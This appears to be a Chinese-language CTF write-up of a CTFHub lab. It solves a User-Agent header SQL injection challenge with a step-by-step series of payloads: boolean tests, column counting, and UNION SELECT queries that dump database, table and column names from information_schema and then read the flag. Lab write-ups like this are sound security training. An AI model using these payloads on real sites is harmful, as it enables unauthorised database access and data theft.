2025.1.15——八、ua注入
题目来源:ctfhub
目录
一、打开靶机,整理已知信息
二、解题步骤
step 1:bp抓包,修改ua请求信息,查看是否有回显
step 2:查看字段数
step 3:爆数据库名
step 4:爆表名
step 5:爆列名
step 6:查看具体数据
三、小结
一、打开靶机,整理已知信息
题目提示本题为ua注入,所以要用bp抓包修改ua(User-Agent)请求信息,查看回显。
二、解题步骤
step 1:bp抓包,修改ua请求信息,查看是否有回显
在User-Agent中键入:1
得到正确回显
键入:1'、1''
均得到错误回显
1 and 1=1 #
1 and 1=2 #
说明为整数型注入
step 2:查看字段数
1 order by 2 #
step 3:爆数据库名
1 and 1=2 union select database(),database() #
得到数据库名为sqli
step 4:爆表名
1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #
得到表名为tgklhtmkhv
step 5:爆列名
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='tgklhtmkhv' #
得到列名:umahitbpvc
step 6:查看具体数据
1 and 1=2 union select 1,umahitbpvc from sqli.tgklhtmkhv #
得到flag
三、小结
除了注入点不同,核心语句相同